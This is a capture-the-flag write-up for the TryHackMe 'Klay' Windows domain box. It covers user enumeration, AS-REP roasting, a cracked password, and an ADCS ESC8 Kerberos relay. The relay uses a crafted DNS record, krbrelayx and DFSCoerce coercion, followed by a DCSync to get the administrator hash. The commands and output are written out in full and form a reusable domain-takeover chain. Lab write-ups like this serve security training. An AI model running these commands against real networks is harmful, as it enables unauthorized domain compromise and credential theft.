--- # System prepended metadata title: 'THM Industrial CTF Klay box writeup ' tags: [industrial, tryahckme, klay, boot2root, CTF, machine] --- --- title: 'THM Industrial CTF Klay box writeup ' --- THM Industrial CTF Klay writeup === ## Table of Contents [TOC] # بسم الله الرحمن الرحيم
## Description NullRook finds a server that appears hardened, and there is no clear way of compromising it. But enumeration is key, and knowing your environment is a sure way to guarantee victory. ZeroTrace reminded NR to relay whatever information is found back to base once the target has been taken down. > It implies it needs alot of enumeration and there is relaying involved. > Aslo the challenge name (klay) implies "kerb relay" ## Recon ```java! ─$ nmap -Pn -sCV 10.10.225.160 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: IIS Windows Server |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-29 20:31:55Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: klay.thm0., Site: Default-First-Site-Name) |_ssl-date: 2025-06-29T20:32:44+00:00; -1s from scanner time. | ssl-cert: Subject: commonName=KlayComputer.klay.thm | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:KlayComputer.klay.thm | Not valid before: 2025-05-10T02:29:37 |_Not valid after: 2026-05-10T02:29:37 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: klay.thm0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=KlayComputer.klay.thm | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:KlayComputer.klay.thm | Not valid before: 2025-05-10T02:29:37 |_Not valid after: 2026-05-10T02:29:37 |_ssl-date: 2025-06-29T20:32:44+00:00; 0s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: klay.thm0., Site: Default-First-Site-Name) |_ssl-date: 2025-06-29T20:32:44+00:00; -1s from scanner time. | ssl-cert: Subject: commonName=KlayComputer.klay.thm | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:KlayComputer.klay.thm | Not valid before: 2025-05-10T02:29:37 |_Not valid after: 2026-05-10T02:29:37 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: klay.thm0., Site: Default-First-Site-Name) |_ssl-date: 2025-06-29T20:32:44+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=KlayComputer.klay.thm | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:KlayComputer.klay.thm | Not valid before: 2025-05-10T02:29:37 |_Not valid after: 2026-05-10T02:29:37 3389/tcp open ms-wbt-server Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: KLAY | NetBIOS_Domain_Name: KLAY | NetBIOS_Computer_Name: KLAYCOMPUTER | DNS_Domain_Name: klay.thm | DNS_Computer_Name: KlayComputer.klay.thm | DNS_Tree_Name: klay.thm | Product_Version: 10.0.17763 |_ System_Time: 2025-06-29T20:32:36+00:00 |_ssl-date: 2025-06-29T20:32:44+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=KlayComputer.klay.thm | Not valid before: 2025-05-09T01:38:50 |_Not valid after: 2025-11-08T01:38:50 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: Host: KLAYCOMPUTER; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-06-29T20:32:37 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required ``` > Usual AD ports ``` kaly.thm klaycomputer.klay.thm ``` > To add to your /etc/hosts with the ip ## Finding creds + Anonymous access is blocked, the guest account also disabled + No website or any service to find users so we will brute them ```javas! ─$ kerbrute userenum --dc KLAYCOMPUTER.klay.thm -d klay.thm /usr/share/seclists/Usernames/Names/names.txt __ __ __ / /_____ _____/ /_ _______ __/ /____ / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ / ,< / __/ / / /_/ / / / /_/ / /_/ __/ /_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ Version: v1.0.3 (9dad6e1) - 06/29/25 - Ronnie Flathers @ropnop 2025/06/29 16:36:09 > Using KDC(s): 2025/06/29 16:36:09 > KLAYCOMPUTER.klay.thm:88 2025/06/29 16:36:13 > [+] VALID USERNAME: andie@klay.thm 2025/06/29 16:36:14 > [+] VALID USERNAME: ardavan@klay.thm 2025/06/29 16:36:16 > [+] VALID USERNAME: audrye@klay.thm 2025/06/29 16:36:16 > [+] VALID USERNAME: aurlie@klay.thm 2025/06/29 16:36:18 > [+] VALID USERNAME: berti@klay.thm 2025/06/29 16:36:20 > [+] VALID USERNAME: blanche@klay.thm 2025/06/29 16:36:20 > [+] VALID USERNAME: bloom@klay.thm 2025/06/29 16:36:21 > [+] VALID USERNAME: brock@klay.thm ... ``` > Through kerbrute we find around 50 users + Next step is to authenticate so we need to find password for one of the users and ASREPROASTING is the key to this ```javascript! └─$ impacket-GetNPUsers klay.thm/ -usersfile users.txt -no-pass [-] User kristian doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User laurene doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User leesa doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User ling-zhong doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User loan doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User lyssa doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User missie doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User nguyet doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User norris doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User patch doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User perle doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$pieter@KLAY.THM:888417f597c63244752f922e8e575d11$0fa38b2ea58ab0ef600f03f06f44efa6a73f9ce06905c89b936e3adb7965d0c8f259fd806704c9235d840b30ec79d406a304de0b7b70c383dd864046e3f03c5d1976b4ce4db8bfdb1ef0121587dda5ffbf846f8c9996d2fd1ad6e52f1aa22a6fe9cb45032de0f1b1217f46d38672357d8f8501becb29745524d6ff8e464f2281f796946ce5c09c61f50cd77410191da5fc058cb05fe966d0270e80f850cf73fd4238a5689591464c714be47e97bb540fdc2e81dff990d6bafb0b044e9b2a822e73fd30bf8771bae98b00117268e1769c309ecccffa4630ab4a74e39f0e2999d57cdbdd5b [-] User quintilla doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User rainer doesn't ha ``` > user pieter is found so let's try cracking his hash ![image](https://hackmd.io/_uploads/SkzPSXyrle.png) > Note the password has the word "relay" in it > Also user pieter has write permission on user called "svc_ca", this user was initially disabled, we can enable him and get his password but it servers no purpose ## Port 80 + This is the Microsoft Active Directory Certificate Services web page where we can request a certificate + Our current user doesn't have access to the machine and trying to get a certificate for him to authenticate also won't work + Running certipy on the target reveals that it's vulnerable to [ESC8](https://www.crowe.com/cybersecurity-watch/exploiting-ad-cs-a-quick-look-at-esc1-esc8) ```java! $ certipy find -u pieter@klay.thm -p 'relayboy22!' -target klay.thm -vulnerable -stdout Certipy v5.0.3 - by Oliver Lyak (ly4k) [!] DNS resolution failed: The DNS query name does not exist: klay.thm. [!] Use -debug to print a stacktrace [*] Finding certificate templates [*] Found 33 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 11 enabled certificate templates [*] Finding issuance policies [*] Found 14 issuance policies [*] Found 0 OIDs linked to templates [!] DNS resolution failed: The DNS query name does not exist: KlayComputer.klay.thm. [!] Use -debug to print a stacktrace [*] Retrieving CA configuration for 'klay-KLAYCOMPUTER-CA' via RRP [!] Failed to connect to remote registry. Service should be starting now. Trying again... [*] Successfully retrieved CA configuration for 'klay-KLAYCOMPUTER-CA' [*] Checking web enrollment for CA 'klay-KLAYCOMPUTER-CA' @ 'KlayComputer.klay.thm' [!] Error checking web enrollment: [Errno 111] Connection refused [!] Use -debug to print a stacktrace [*] Enumeration output: Certificate Authorities 0 CA Name : klay-KLAYCOMPUTER-CA DNS Name : KlayComputer.klay.thm Certificate Subject : CN=klay-KLAYCOMPUTER-CA, DC=klay, DC=thm Certificate Serial Number : 498DCBE91B891FAA44DA223858928F1E Certificate Validity Start : 2025-05-10 02:26:38+00:00 Certificate Validity End : 2075-05-10 02:36:38+00:00 Web Enrollment HTTP Enabled : True HTTPS Enabled : False User Specified SAN : Disabled Request Disposition : Issue Enforce Encryption for Requests : Enabled Active Policy : CertificateAuthority_MicrosoftDefault.Policy Permissions Owner : KLAY.THM\Administrators Access Rights ManageCa : KLAY.THM\Administrators KLAY.THM\Domain Admins KLAY.THM\Enterprise Admins ManageCertificates : KLAY.THM\Administrators KLAY.THM\Domain Admins KLAY.THM\Enterprise Admins Enroll : KLAY.THM\Authenticated Users [!] Vulnerabilities ESC8 : Web Enrollment is enabled over HTTP. Certificate Templates : [!] Could not find any certificate templates ``` + In normal cases it would be done using NTLM relay but not our case it won't work ![image](https://hackmd.io/_uploads/H19-v71rex.png) + Our second approach is to use kerberos relay not NTLM, and this requires adding a dnsRecord that points to our kali machine, then coercing to force the DC to authenticate to use + Next is capturing his capturing his hash and relay it back to the ADCS endpiont. # krbrelay ### 1. Add dnsRecord ```java! -$ bloodyAD --host klaycomputer.klay.thm -u 'pieter' -p 'relayboy22!' -k -d 'klay.thm' add dnsRecord 'KlayComputer1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' [+] KlayComputer1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added │ ``` ### 2. Run krbrelay ```java! └─$ python /opt/opt/krbrelayx/krbrelayx.py -t 'http://KLAYCOMPUTER.klay.thm/certsrv/certfnsh.asp' --adcs --template DomainController -v 'KLAYCOMPUTER$' ``` ### 3. Coerce and force the DC to authenticate to us + In another terminal while our krbrelayx is waiting, run this command ```java $ nxc smb klay.thm -u pieter -p relayboy22\! -M coerce_plus -o LISTENER=KlayComputer1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA SMB 10.10.225.160 445 KLAYCOMPUTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:KLAYCOMPUTER) (domain:klay.thm) (signing:True) (SMBv1:False) SMB 10.10.225.160 445 KLAYCOMPUTER [+] klay.thm\pieter:relayboy22! COERCE_PLUS 10.10.225.160 445 KLAYCOMPUTER VULNERABLE, DFSCoerce ``` + The output on krbrelayx terminal: ![image](https://hackmd.io/_uploads/rJSm5Q1Slg.png) > Nice, now we can use this pfx file to authenticate and perform DCSync to dump users hashes ```java! -$ certipy auth -pfx KLAYCOMPUTER\$.pfx -domain klay.thm -dc-ip 10.10.225.160 ``` ![image](https://hackmd.io/_uploads/S1sS9mJrxx.png) # DCSync ![image](https://hackmd.io/_uploads/rk4YiQJHgl.png) + Now all is left to use the administrator NTLM hash to login and grab the flag ![image](https://hackmd.io/_uploads/Skxrs7JSgg.png) + Thank you for reading # Credits + Team: Toasters + ʎɐsǝǝu [HackTheBox](https://app.hackthebox.com/profile/1725001)